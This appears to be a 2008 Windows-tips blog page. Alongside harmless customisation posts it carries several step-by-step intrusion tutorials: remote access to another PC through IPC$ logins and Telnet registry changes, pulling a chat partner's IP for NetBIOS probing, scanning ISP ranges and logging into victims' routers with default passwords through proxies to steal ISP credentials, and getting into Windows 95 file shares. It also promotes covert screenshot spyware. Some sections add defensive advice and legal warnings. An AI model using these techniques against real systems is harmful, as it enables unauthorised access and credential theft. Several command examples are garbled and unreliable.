Saturday, May 10, 2008

Make XP Look Like Vista

Introduction:
Despite Windows Vista being out for a while now, not everyone is ready or willing to make the big "switch" just yet. Some people are waiting for the time to buy a new PC, some are not upgrading because their hardware isn't up to it, and some well.....just don't want to. Well there's nothing wrong with wanting to stick with XP for a while, but maybe you would like to change the "look" of XP to more of a Vista "style".
The interest in making Windows XP look like Vista has been going on for a while, but I get asked to this day what are the best ways to change the desktop to look more like Vista. Some want just the visual style changed, and some want the entire look and feel of their desktop changed to reflect Vista.
In this article, we'll explain the quickest and safest way to change Windows XP to look more like Windows Vista.
Changing the Visual Style
For this you will need WindowBlinds 6. WindowBlinds 6 is available as a stand-alone application, or part of the Object Desktop suite of desktop enhancements. WindowBlinds is the best and safest way to change the complete look of Windows, whether it's to make it look like Vista, or any one of the thousands of skins available.
WindowBlinds 6
WindowBlinds 6 adds true glass effects including an optional blur which will give you the best results in your "transformation" from XP to Vista. It also has a "Vista-ize me" feature which sets the transparency and blurring to best resemble Windows Vista. Additionally, transparency is adjustable and you can set it to the desired levels yourself.
Vista-ize me" feature
There seems like a countless number of Vista skins are available for download, some even caught the attention of Microsoft and had to be removed. So for today's guide I am going to use a Vista skin that will give you the Vista "look" and takes advantage of WindowBlinds features. These are two of my personal favorites.
Arrow
Jadaero 1.4
Mimic Vista v3
There are many different variations of Vista-inspired skins available. You just need to take a browse through sites like WinCustomize and find one that you like.
Wallpapers
Now that the visual style is done, lets find a nice wallpaper. While there is not a definitive wallpaper for Vista, I'm going to use one that is popular and goes with the Vista theme.
Vista Ultimate Series
Vista Suite Wallpaper pack
Vista Media
Vista Aurora Wallpaper Suite

WindowBlinds has a built-in wallpaper changer that makes it easy to change your wallpaper, but you can also apply it like any other wallpaper. There is a huge gallery of wallpapers in the WinCustomize galleries, so you can browse there and find one that suits you best.
Changing the boot screen
While Windows Vista doesn't have much of a bootskin that doesn't mean you can't use one. Using the Bootskin (free) application you can change the boot screen in Windows XP. Here are a couple of my favorites to add to the Vista look, but you can find thousands more in the Bootskin gallery.
Vista Ultimate Boot
Real Vista Boot
Real Vista Changing the Bootskin
Changing the logon screen
Once you're past the boot screen you are probably facing a logon screen now, and that's just as easy to change as well. Download LogonStudio (free) for Windows XP, load up your favorite logon and your Vista transformation is one step closer to complete.
After you install LogonStudio, it's simply a matter of choosing from the list of logons you downloaded, and clicking "apply". Here are some logons I recommend, or search for Vista logons here.
Vista Reaction
Simple Vista dx revisited
Changing the Windows Logon
Changing the Icons
IconPackager gives you ability to change nearly all your Windows icons at once, and it is also easy to create your own icon packs. This is a great solution as you won't have to worry about changing individual icons, and there are hundreds of other icon packs available. I had a hard time finding an icon package that was close to what Vista really is, so I used one that I liked and thought fit well anyways.
Aero IconPackage
Apogee Icon Suite IconPackager
Adding a Sidebar
Thanks to DesktopX, adding your own Vista Sidebar is easy as a few clicks. One of my favorites is the Vista Sidebar by kennhk. He also makes some stand-alone widgets that fit perfectly with your Vista desktop also. Once you have DesktopX installed it's as simple as a couple of clicks and your sidebar will be up and running. It's also very easy to configure DesktopX objects to add or remove the components you want.
Vista Sidebar
Conclusion
We have gone over the ways you can easily change your default Windows XP desktop into a Vista-like experience. The skins and themes I used for this guide are just a small sample of the many Vista inspired skins that are out there. You don't have to make it exactly like Vista, you are free to pick and choose skins and make your desktop as personalized as you want.
This is the XP desktop that we have transformed into a great Vista looking desktop.
XP desktop now looks like Vista
If you need some more information on some of these programs work and how they change your desktop then I'd like to recommend reading the "Change Your Desktop Theme" articles. I would also recommend taking a look at Object Desktop, which includes many of the applications used to create our Vista desktop.

REMOTE ACCESS METHOD

ust Control Another Computer Remotely.

Things to Need
Remote Pc's Account Username And Password


<-- Method -->

1. Go tO Command Prompt(press Windows+R and type cmd)
2. type cd\ (to go to main root Of C:)
3. type the command
c:\net use \\(Rempote PC's Username i.e Adrian)\ipc$ /u:Administrator
c:\net use \\Adrian\ipc$ /u:Administrator(press Enter)
(Results of the above Command)
The Password Or Username Is Invalid For \\Adrian\ipc$.
Enter The PassWord For "Administrator" tp connect to 'Adrian':*****
The Command COmpleted Successfuly.
4. Press Window+R Write regedit To Enter RegsitryEditor.
5. Press Alt+F Then C.
6. Write Down The "Object's Name".Adrian(Computer's Username)then Press Enter.
(New Computer's Registry Is Successsfully Accessed).
7. Just GO TO
Adrian\HKEY_LOCAL_MACHINE\SFTWARE\Microsoft\Windows\TelnetServer\1.0
On The Right Hand Double Click On The Key Named As "NTLM"(New BOx Appear)
Value Name:NTLM
Value Data:(Replace 2 with 0)
Base :HexaDecimal
Press OK.
Get Out Of registry Editor.
8. Again Press Windows+R And Write mmc.(Consol1 Will Open)
9. Press Alt+F then M(New Windows Will Appear)
10.Press Alt+D Then Double Click On "Computer Management"
11.Select "another Computer" and write its Account Login(Adrian).
12.Press Finish And Then Close The "Add StandALone Snap-in"Dialogue Box.
13.Now Press OK Of "Add/Remove Snap-in".
14.On The Left Hand Expand Computer Management>Select Services And
Applications>Services
15.On The Right Hand Scroll down And Right CLick At "Telnet"And Select Restart
Option.
16.Leave It As It is
17.Turn To Command Promt Write
c:\telnet Adrian(Press Enter)
it Will Require Login And PassWord
Login:Administrator
PassWord:********(Enter)
*-----------------------------------------------------------
Welcome TO Microsoft Telnet SErver
C:dir(Enter)

Thats It!
Enjoy With DADECODERS!!!

HACKING THROUGH YAHOO

Hack a Yahoo Account While Chatting:

This is only for education purpose. So who ever try this is at his risk.
I am not sure that this will work 100 %. But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol leave a comment here after u see the post lemme know if it does works or not or u having a problem..

Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has two options
a) Either it uplo--- the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server.
b) Or it has client to client connection And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.

Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques. Thats what makes a difference between a real hacker and new bies. So lets ----ye

1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances.

I will explain only for files here which lies same for Video or audio
1) Go to dostype ->netstat -n 3 You will get the following output.
Just do not care and be cool Active Connections

Proto Local Address Foreign Address State TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address StateTCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED.

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target .if the files comes from server.Thats the file is uploaded leave it You will not get the ip.But if a direct connection is established HMMMM then the first attacker first phase is over This is the output in your netstat.The 5101 number port is where the Attacker is connected.Active Connections
Proto Local Address Foreign Address StateTCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHEDTCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
Thats what is highlighted in RED. So what next

3) Hmmm Ok so make a DOS attack now Go to dos prompt and Just donbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.C:\>nbtstat -A 194.30.209.14
Local Area Connection: Node IpAddress: [194.30.209.15] Scope Id: []
Net BIOS Remote Machine Name Table
Name Type Status---------------------------------------------EDP12 <00> UNIQUE RegisteredSHIV <00> GROUP RegisteredSHIV <20> UNIQUE RegisteredSHIVCOMP1 <1e> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
Ok so you will ask now what next.No you find what you can do with this network than me explaining everything.

So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.

HACKING DSL ROUTER

This tutorial will explain to you how to hack someone's internet account thru his router.This hack is based on a secuirty exploit of the router's default password and the stupidity of the user.

Explanation: when somebody buy's a xDSL/Cabel router, the router is set to manufactory defaults like IP range, user accounts, router table, and most important the security level. The last one we will exploit.Most routers will have a user friendly setup menu running on port 23 (telnet) and sometimes port 80 (http) or both.This is what we are looking for.

Step 1.
Get a multie IP range scanner like superscanner (superscanner is fast and easy to use, get it here).Get a xDSL/Cabel user IP range.
This is a single user IP 212.129.169.196 so the ip range of this Internet provider is 212.129.xxx.xxx most likely it will be from 212.129.1.1 to 212.129.255.255 .
To keep your scanning range not to big it's smart to scan from 212.129.1.1 to 212.129.1.255 it also depends of your bandwidth how fast the scan will be finished.The IP adres above is just a example any IP range from a xDSL/Cabel provider can be used for this hack.
before you start scanning specify the TCP/IP ports. You know that we are looking for TCP port 23 (telnet) and TCP port 80 (http) so edit the list and select only port 23 and port 80.Now start scanning and wait for the results.When finished scanning look for a IP that has a open port 23 and 80. Write them down or remember them.

Step 2.

Way 1
This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and address (56.9 modem for example) when connection to the victim's router.
Now get a telnet program. Windows has a standard telnet program just go to start, select run and type down "telnet" without the ", click or enter OK.Select "connect" than "Remote system" enter IP adres of the victim in the "host name" field press OK.
wait for your computer to make a connection. This way only works when the router has a open telnet port service running.

Way 2
This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and adres (56.9 modem for example) when connection to the victim's router.Open a Internet explorer windows enter the IP address of the victim after the http:// in the address bar.This way only works when the router has a open hyper text transfer protocol (http) service running.

Step 3
Entering the userfriendly setup menu. 9 out of 10 times the menu is protected by a loginname and password. When the user doesn't change any security value's the default password stay's usable.So the only thing you have to do is find out what type of router the victim uses. I use this tool: GFILanguard Network Security Scanner. (get it here) is good. When you find out the type of router that's been used get the wright login name and password from this list (get it here. not every router is on the list)
Default router password list

Step 4
When you have a connection in telnet or internet expolorer you need to look for user accounts.PPP, PPtP, PPeP, PPoP, or such connection protocol. If this is not correct look for anything that maybe contains any info about the ISP account of the user.go to this option and open it. Most likely you will see a overview of user setup options.Now look for the username and password.In most case the username will be freely displayed so just write it down or what ever....The password is a different story. Allmost always the password is protected by ********* (stars) in the telnet way there is noway around it (goto another victim) but when you have a port 80 connection (http). Internet connection way open click right mouse key and select "View source" now look for the field where the star are at. most likely you can read it because in the source code the star are converted to normal ASCII text.If not get a "******** to text" convertor like snadboy's revelation V.2 (get it here) move the cursor over the ****** and....It's a miracle you can read the password.Now you have the username and password. There a million fun thing to do with that but more about that next time.check the tutorial page frequently.

Tips.
Beware on most routers only one person can be loget on simultaneous in the router setupmenu.Don't change anything in the router if you don't know what you are doing.

DOS HACKING

******************************************************
In this Guide you will learn how to: * Use telnet from Windows * Download web pages via telnet * Get finger information via telnet * Telnet from the DOS command-line * Use netcat * Break into Windows Computers from the Internet Protecting Yourself What can they do The command-line approach The GUI approach Final Words ************************************************************
How to Use Telnet on a Windows Computer Telnet is great little program for doing a couple of interesting things. In fact, if you want to call yourself a hacker, you absolutely MUST be able to telnet! In this lesson you will find out a few of the cool things a hacker can do with telnet. If you are using Win95, you can find telnet in the c:\windows directory, and on NT, in the c:\winnt\system32 directory. There isn't a lot of online help concerning the usage of the program, so my goal is to provide some information for new users. First off, telnet isn't so much an application as it is a protocol. Telnet is protocol that runs over TCP/IP, and was used for connecting to remote computers. It provides a login interface, and you can run command-line programs by typing the commands on your keyboard, and the programs use the resources of the remote machine. The results are displayed in the terminal window on your machine, but the memory and CPU cycles consumed by the program are located on the remote machine. Therefore, telnet functions as a terminal emulation program, emulating a terminal on the remote machine. Now, telnet runs on your Win95 box as a GUI application...that is to say that you can type "telnet" at the command prompt (in Windows 95 this is the MS-DOS prompt), and assuming that your PATH is set correctly, a window titled "telnet" will open. This differs from your ftp program in that all commands are entered in the DOS window. Let's begin by opening telnet. Simply open a DOS window by clicking "start", then "programs", then "MS-DOS", and at the command prompt, type: c:\telnet The window for telnet will open, and you can browse the features of the program from the menu bar. ***************************************************
NEWBIE NOTE: In this text file, I am referring only to the telnet program that ships with Win95/NT. If you type "telnet" at the command prompt and you don't get the telnet window, make sure that the program is on your hard drive using the Start -> Find -> Files or Folders command. Also make sure that your path statement includes the Windows directory. There are many other programs available that provide similar functionality, with a lot of other bells and whistles, from any number of software sites. *************************************************
To learn a bit more about telnet, choose Help -> Contents, or Help -> Search for help on... from the menu bar. Read through the files in order to find more detailed explanations of things you may wish to do. For example, in this explanation, I will primarily be covering how to use the application and what it can be used for, but now how to customize the colors for the application. Now, if you choose Connect -> Remote System, you will be presented with a dialog window that will ask you for the remote host, the port and the terminal type. ****************************************************
NEWBIE NOTE: For most purposes, you can leave the terminal type on VT100. ****************************************************
In the Connect dialog box, you can enter in the host to which you wish to connect, and there is a list box of several ports you can connect to: daytime: May give you the current time on the server. echo: May echo back whatever you type in, and will tell you that the computer you have connected to is alive nd running on the Internet. qotd: May provide you with a quote of the day. chargen: May display a continuous stream of characters, useful for spotting network problems, but may crash your telnet program. telnet: May present you with a login screen. These will only work if the server to which you are trying to connect is running these services. However, you are not limited to just those ports...you can type in any port number you wish. (For more on fun ports, see the GTMHH, "Port Surf's Up.") You will only successfully connect to the port if the service in question is available. What occurs after you connect depends upon the protocol for that particular service. When you are using telnet to connect to the telnet service on a server, you will (in most cases) be presented with a banner and a login prompt. [Note from Carolyn Meinel: Many people have written saying their telnet program fails to connect no matter what host they try to reach. Here's a way to fix your problem. First -- make sure you are already connected to the Internet. If your telnet program still cannot connect to anything, here's how to fix your problem. Click "start" then "settings" then "control panel." Then click "Internet" then "connection." This screen will have two boxes that may or may not be checked. The top one says "connect to the Internet as needed." If that box is checked, uncheck it -- but only uncheck it if you already have been having problems connecting. The bottom box says "connect through a proxy server." If that box is checked, you probably are on a local area network and your systems administrator doesn't allow you to use telnet.] *********************************************
NEWBIE NOTE: It's not a good idea to connect to a host on which you don't have a valid account. In your attempts to guess a username and password, all you will do is fill the log files on that host. From there, you can very easily be traced, and your online service provider will probably cancel your account.
**********************************************
Now, you can also use telnet to connect to other ports, such as ftp (21), smtp (25), pop3 (110), and even http (80). When you connect to ftp, smtp, and pop3, you will be presented with a banner, or a line of text that displays some information about the service. This will give you a clue as to the operating system running on the host computer, or it may come right out and tell you what the operating system is...for instance, AIX, Linux, Solaris, or NT. If you successfully connect to port 80, you will see a blank screen. This indicates, again, that you have successfully completed the TCP negotiation and you have a connection. Now, what you do from there is up to you. You can simply disconnect with the knowledge that, yes, there is a service running on port 80, or you can use your knowledge of the HTTP protocol to retrieve the HTML source for web pages on the server. How to Download Web Pages Via Telnet To retrieve a web page for a server using telnet, you need to connect to that server on port 80, generally. Some servers may use a different port number, such as 8080, but most web servers run on port 80. The first thing you need to do is click on Terminal -> Preferences and make sure that there is a check in the Local Echo box. Then, since most web pages will generally take up more than a single screen, enable logging by clicking Terminal -> Start Logging... and select a location and filename. Keep in mind that as long as logging is on, and the same file is being logged to, all new information will be appended to the file, rather than overwriting the original file. This is useful if you want to record several sessions, and edit out the extraneous information using Notepad. Now, connect the remote host, and if your connection is successful, type in: GET / HTTP/1.0 and hit enter twice. **************************************************
NEWBIE NOTE: Make sure that you hit enter twice...this is part of the HTTP protocol. The single / after GET tells the server to return the default index file, which is generally "index.html". However, you can enter other filenames, as well. *************************************************
You should have seen a bunch of text scroll by on the screen. Now you can open the log file in Notepad, and you will see the HTML code for the page, just as though you had chosen the View Source option from your web browser. You will also get some additional information...the headers for the file will contain some information about the server. For example: HTTP/1.0 200 Document follows Date: Thu, 04 Jun 1998 14:46:46 GMT Server: NCSA/1.5.2 Last-modified: Thu, 19 Feb 1998 17:44:13 GMT Content-type: text/html Content-length: 3196 One particularly interesting piece of information is the server name. This refers to the web server software that is running and serving web pages. You may see other names in this field, such as versions of Microsoft IIS, Purveyor, WebSite, etc. This will give you a clue as to the underlying operating system running on the server.
************************************************* SYSADMIN NOTE: This technique, used in conjunction with a database of exploits on web servers, can be particularly annoying. Make sure you keep up on exploits and the appropriate security patches from your web server and operating system vendors.
*************************************************
*************************************************
NEWBIE NOTE: This technique of gathering web pages is perfectly legal. You aren't attempting to compromise the target system, you are simply doing by hand what your web browser does for you automatically. Of course, this technique will not load images and Java applets for you. ************************************************
Getting Finger Information Via Telnet By now, you've probably heard or read a lot about finger. It doesn't seem like a very useful service, and many sysadmins disable the service because it provides information on a particular user, information an evil hacker can take advantage of. Win95 doesn't ship with a finger client, but NT does. You can download finger clients for Win95 from any number of software sites. But why do that when you have a readily available client in telnet? The finger daemon or server runs on port 79, so connect to a remote host on that port. If the service is running, you will be presented with a blank screen. ****************************************************
NEWBIE NOTE: NT doesn't ship with a finger daemon (A daemon is a program on the remote computer which waits for people like you to connect to it), so generally speaking, and server that you find running finger will be a Unix box. I say "generally" because there are third-party finger daemons available and someone may want to run one on their NT computer. ****************************************************
The blank screen indicates that the finger daemon is waiting for input. If you have a particular user that you are interested in, type in the username and hit enter. A response will be provided, and the daemon will disconnect the client. If you don't know a particular username, you can start by simply hitting enter. In some cases, you may get a response such as "No one logged on." Or you may get information of all currently logged on users. It all depends on whether or not the sysadmin has chosen to enable certain features of the daemon. You can also try other names, such as "root", "daemon", "ftp", "bin", etc. Another neat trick to try out is something that I have seen referred to as "finger forwarding". To try this out, you need two hosts that run finger. Connect to the first host, host1.com, and enter the username that you are interested in. Then go to the second host, and enter: user@host1.com You should see the same information! Again, this all depends upon the configuration of the finger daemon. Using Telnet from the Command Line Now, if you want to show your friends that you a "real man" because "real men don't need no stinkin' GUIs", well just open up a DOS window and type: c:\>telnet and the program will automatically attempt to connect to the host on the designated port for you. Using Netcat Let me start by giving a mighty big thanks to Weld Pond from L0pht for producing the netcat program for Windows NT. To get a copy of this program, which comes with source code, simply go to: http://www.l0pht.com/~weld NOTE: The first character of "l0pht: is the letter "l". The second character is a zero, not an "o". I know that the program is supposed to run on NT, but I have seen it run on Win95. It's a great little program that can be used to do some of the same things as telnet. However, there are advantages to using netcat...for one, it's a command-line program, and it can be included in a batch file. In fact, you can automate multiple calls to netcat in a batch file, saving the results to a text file.
**************************************************
NOTE: For more information on batch files, see previous versions of the Guide To (mostly) Harmless Hacking, Getting Serious with Windows series ...one of them dealt with basic batch file programming.
**************************************************
Before using netcat, take a look at the readme.txt file provided in the zipped archive you downloaded. It goes over the instructions on how to download web pages using netcat, similar to what I described earlier using telnet. There are two ways to go about getting finger information using netcat. The first is in interactive mode. Simply type: c:\>nc 79 If the daemon is running, you won't get a command prompt back. If this is the case, type in the username and hit enter. Or use the automatic mode by first creating a text file containing the username of interest. For example, I typed: c:\>edit root and entered the username "root", without the quotes. Then from the command prompt, type: c:\>nc 79 <>nc 79 <> nc.log to create the file nc.log, or: c:\>nc 79 <>> nc.log to append the response to the end of nc.log. NOTE: Make sure that you use spaces between the redirection operators.

How to Break into a Windows 95 machine Connected to the Internet Disclaimer The intent of this file is NOT to provide a step-by-step guide to accessing a Win95 computer while it is connected to the Internet. The intent is show you how to protect yourself. There are no special tools needed to access a remote Win95 machine...everything you need is right there on your Win95 system! Two methods will be described...the command-line approach and the GUI approach. Protecting Yourself First, the method of protecting yourself needs to be made perfectly clear. DON'T SHARE FILES!! I can't stress that enough. If you are a home user, and you are connecting a Win95 computer to the Internet via some dial-up method, disable sharing. If you must share, use a strong password...8 characters minimum, a mix of upper and lower case letters and numbers, change the password every now and again. If you need to transmit the password to someone, do so over the phone or by written letter. To disable sharing, click on My Computer -> Control Panel -> Network -> File and Print Sharing. In the dialog box that appears, uncheck both boxes. It's that easy. What Can They Do? What can someone do? Well, lots of stuff, but it largely depends on what shares are available. If someone is able to share a printer from your machine, they can send you annoying letters and messages. This consumes time, your printer ink/toner, and your paper. If they are able to share a disk share, what they can do largely depends upon what's in that share. The share appears as another directory on the attacker's machine, so any programs they run will be consuming their own resources...memory, cpu cycles, etc. But if the attacker has read and write access to those disk shares, then you're in trouble. If you take work home, your files may be vulnerable. Initialization and configuration files can be searched for passwords. Files can be modified and deleted. A particularly nasty thing to do is adding a line to your autoexec.bat file so that the next time your computer is booted, the hard drive is formatted without any prompting from the user. Bad ju-ju, indeed. ** The command-line approach ** Okay, now for the part that should probably be titled "How they do it". All that is needed is the IP address of the remote machine. Now open up a DOS window, and at the command prompt, type: c:\>nbtstat -A [ip_addr] If the remote machine is connected to the Internet and the ports used for sharing are not blocked, you should see something like: NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- NAME <00> UNIQUE Registered DOMAIN <00> GROUP Registered NAME <03> UNIQUE Registered USERNAME <03> UNIQUE Registered MAC Address = 00-00-00-00-00-00 This machine name table shows the machine and domain names, a logged-on username, and the address of the Ethernet adapter (the information has been obfuscated for instructional purposes). **Note: This machine, if unpatched and not protected with a firewall or packet-filter router, may be vulnerable to a range of denial of service attacks, which seem to be fairly popular, largely because they require no skill or knowledge to perpetrate. The key piece of information that you are looking for is in the Type column. A machine that has sharing enabled will have a hex code of "<20>". **Note: With the right tools, it is fairly simple for a sysadmin to write a batch file that combs a subnet or her entire network, looking for client machines with sharing enabled. This batch file can then be run at specific times...every day at 2:00 am, only on Friday evenings or weekends, etc. If you find a machine with sharing enabled, the next thing to do is type the following command: c:\>net view \\[ip_addr] Now, your response may be varied. You may find that there are no shares on the list, or that there are several shares available. Choose which share you would like to connect to, and type the command: c:\>net use g: \\[ip_addr]\[share_name] You will likely get a response that the command was completed successfully. If that is the case, type: c:\>cd g: or which ever device name you decided to use. You can now view what exists on that share using the dir commands, etc. Now, you may be presented with a password prompt when you ssue the above command. If that is the case, typical "hacker" (I shudder at that term) methods may be used. ** The GUI approach ** After issuing the nbtstat command, you can opt for the GUI approach to accessing the shares on that machine. To do so, make sure that you leave the DOS window open, or minimized...don't close it. Now, use Notepad to open this file: c:\windows\lmhosts.sam Read over the file, and then open create another file in Notepad, called simply "Lmhosts", without an extension. The file should contain the IP address of the host, the NetBIOS name of the host (from the nbtstat command), and #PRE, separated by tabs. Once you have added this information, save it, and minimize the window. In the DOS command window, type: c:\>nbtstat -R This command reloads the cache from the Lmhosts file you just created. Now, click on Start -> Find -> Computer, and type in the NetBIOS name of the computer...the same one you added to the lmhosts file. If your attempt to connect to the machine is successful, you should be presented with a window containing the available shares. You may be presented with a password prompt window, but again, typical "hacker" (again, that term grates on me like fingernails on a chalk board, but today, it seems that it's all folks understand) techniques may be used to break the password.

************************************************

Note from Carolyn Meinel: Want to try this stuff without winding up in jail or getting expelled from school? Get a friend to give you permission to try to break in. First, you will need his or her IP address. Usually this will be different every time your friend logs on. You friend can learn his or her IP address by going to the DOS prompt while online and giving the command "netstat -r". Something like this should show up: C:\WINDOWS>netstat -r Route Table Active Routes: Network Address Netmask Gateway Address Interface Metric 0.0.0.0 0.0.0.0 198.999.176.84 198.999.176.84 1 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1 198.999.176.0 255.255.255.0 198.999.176.84 198.999.176.84 1 198.999.176.84 255.255.255.255 127.0.0.1 127.0.0.1 1 198.999.176.255 255.255.255.255 198.999.176.84 198.999.176.84 1 224.0.0.0 224.0.0.0 198.999.176.84 198.999.176.84 1 255.255.255.255 255.255.255.255 198.999.176.84 0.0.0.0 1 Your friend's IP address should be under "Gateway Address." Ignore the 127.0.0.1 as this will show up for everyone and simply means "locahost" or "my own computer." If in doubt, break the Internet connection and then get online again. The number that changes is the IP address of your friend's computer.


***************************************************

**************************************************

Evil Genius tip: Here is something really scary. In your shell account give the "netstat" command. If your ISP allows you to use it, you might be able to get the dynamically assigned IP addresses of people from all over the world -- everyone who is browsing a Web site hosted by your ISP, everyone using ftp, spammers you might catch red-handed in the act of forging email on your ISP, guys up at 2AM playing on multiuser dungeons, IRC users, in fact you will see everyone who is connected to your ISP! **************************************************** ***************************************************

YOU CAN GO TO JAIL WARNING: If you find a Windows 95 box on the Internet with file sharing enabled and no password protection, you can still get in big trouble for exploiting it. It's just like finding a house whose owner forgot to lock the door -- you still are in trouble if someone catches you inside. Tell temptation to take a hike! ************************************************

Final Words Please remember that this Guide is for instructional purposes only and is meant to educate the sysadmin and user alike. If someone uses this information to gain access to a system which they have no permission or business messing with, I (keydet) cannot be responsible for the outcome. If you are intending to try this information out, do so with the consent and permission of a friend. If there are questions, comments or any doubts then feel free to ask me heregreetz,

Friday, May 9, 2008

Change STARTUP and SHUTDOWN sounds in XP

Have you ever felt bugged-up with the Start-up and Shutdown jingle of your Windows XP or Vista ? If yes, here is the solution, now you use any of your favorite voice or music or dialogue as your PC’s shutdown and start up.

It’s a simple 4 step process.

Step 1.

Choose the track which you want to play at start-up and shutdown jingles,
Limitations are
* It should be in .WAV format.
* The size of file should not be large, prefer keeping them within in 1 Mb,
otherwise your startup will take a bit longer.

If the file you want to make your start-up or shutdown is not in .WAV format,
you can easily convert them using Jet Audio 7, or any other converter.

Step 2.

Now rename these files as “Windows XP Startup.WAV” and “Windows XP Shutdown.WAV” respectively.

Step 3.

Now Go to “C:\WINDOWS\MEDIA”, here you will find files “Windows XP Startup.WAV”
and “Windows XP Shutdown.WAV”, move them to some other locations,
this step is required for, in case you need to revert back these sounds,
else you can ignore this step.

Step 4.

Now the files you have chosen and renamed,
just copy-paste or cut paste them in
“C:\WINDOWS\MEDIA”, here you go,
now you can enjoy the new Start-up and shutdown.

Restrict PC Shutdown

Both Vista and Windows XP let you take control of preventing a user not to shutdown the machine by editing the group policy.
For example if your friend is using your computer and you went somewhere ( and you have still some unsaved document left) and he shutdowns the pc without saving them…you loose a good amount of data.
( Trust me I have lost one whole blog post and project code at same time ).
This is what you can do

Restrict PC Shutdown

* Type gpedit.msc in run dialog box [ WIN KEY + R ]

* This will open Group Policy Editor. Now there are two things in it,
Computer Configuration and User Configuration

* Click on User Configuration > Administrative Templates > Start Menu and Task Bar

* Now look for “remove and prevent access to shutdown command”

* Double Click and Enable it.

* Exit the group policy editor.This setting removes the Shut Down option from the Start menu and disables the Shut Down button on the Windows Security dialog box, which appears when you press CTRL+ALT+DEL.

This setting prevents users from using the Windows user interface to shut down the system.
Now if you try to shutdown by clicking on start , the shutdown button must have disappeared. Moreover check the task manager and you will find all shutdown,restart and others disabled except switch user.


SO YOU WILL NEVER LOOSE YOUR DATA.

Add Safe Mode in Boot list

Safe mode is required when you have to fix a problem such as virus infection or uninstalling drivers in your windows XP. generally we need to use F8 Key to get into safe mode and if not timed properly you will need to restart windows xp again.

Here is a small trick which lets you add Safe mode by default into your Boot list. You will see it when you restart your windows xp machine.

Steps to Add Safe Mode in Boot list

* Go to control panel > System.

* Click on Advanced Tab.

* Then click on settings under the startup and recovery action.

* Click on edit under system startup to indirectly edit your boot.ini file.

* Add the following entry
“multi(0)disk(0)rdisk(0)partition(2)\WINDOWS=”XP - Safe Mode” /
fastdetect/ safeboot:minimal/sos/bootlog” without quotes .

Add safe mode to your boot listThats it, restart your machine and you will see another label as “XP- Safe Mode” added to the list.PS: This option is also used for adding any other windows installation on other partition.

Hide ur drives and Lock ur drives

Open Registry (go to run command, type "regedit" and press enter)
then go to this key
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
now right click in right side pane and create DWORD Value (blue color)
Rename it as "NoViewOnDrive" (for locking drive)
or
Rename it as "NoDrives" (for Hiding drive)

double click on it and put some numbers to lock ur desired Drive and click OK.
DRIVE NOS.
FOR A : 1
FOR C : 4
FOR D : 8
FOR E : 16
FOR F : 32
FOR G : 64
FOR H : 128
finally restart or log-off the computer to take effect.
Keep in mind that "0" is Default Value to Disable or remove this setting..

After locking the drive when u try to open it, u will see a msgbox like this"This operation has been cancelled due to restrictions in effect on this computer.
Please contact your system administrator"

Put an image/photo as folder background

You have to have a photo in ur folder for example:
sample.jpg. After that, just open notepad and

write: [{BE098140-A513-11D0-A3A4-00C04FD706EC}]
ICONAREA_IMAGE=sample.jpgICONAREA_TEXT=255

Save it as desktop.ini and press F5.

USE PC SPY TO MONITER YOUR PC

DOWNLOAD Features:-It will take screen shot of ur window after every 10 seconds
and will store it in c:\Program Files directory and Asks for password whenever u try to exit
So now u can see wat others r doin on ur machine while u r not there .


Don't forget to leave ur comment

ENJOY

CANGE / ADD RESTRICTIONS IN WINDOWS

1.Open>>>>>RegEdit


2.Go to HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion
\Policies


3.Go to the Explorer Key


4.Then right click on the right side pane and select "Create Dword".
Select appropriate value name from the list given below and enter "1" for
enabling the value and "0" for disabling it.


NoDeletePrinter - Disables Deletion of Printers
NoAddPrinter - Disables Addition of Printers
NoRun - Disables Run Command
NoSetFolders - Removes Folders from Settings on Start Menu
NoSetTaskbar - Removes Taskbar from Settings on Start Menu
NoFind - Removes the Find Command
NoDrives - Hides Drives in My Computers
NoNetHood - Hides the Network Neighborhood
NoDesktop - Hides all icons on the Desktop
NoClose - Disables Shutdown
NoSaveSettings - Don't save settings on exit
DisableRegistryTools - Disable Registry Editing Tools
NoRecentDocsMenu - Hides the Documents shortcut at the Start button
NoRecentDocsHistory- Clears history of Documents
NoFileMenu _ Hides the Files Menu in Explorer
NoActiveDesktop - No Active Desktop
NoActiveDesktopChanges- No changes allowed
NoInternetIcon - No Internet Explorer Icon on the Desktop
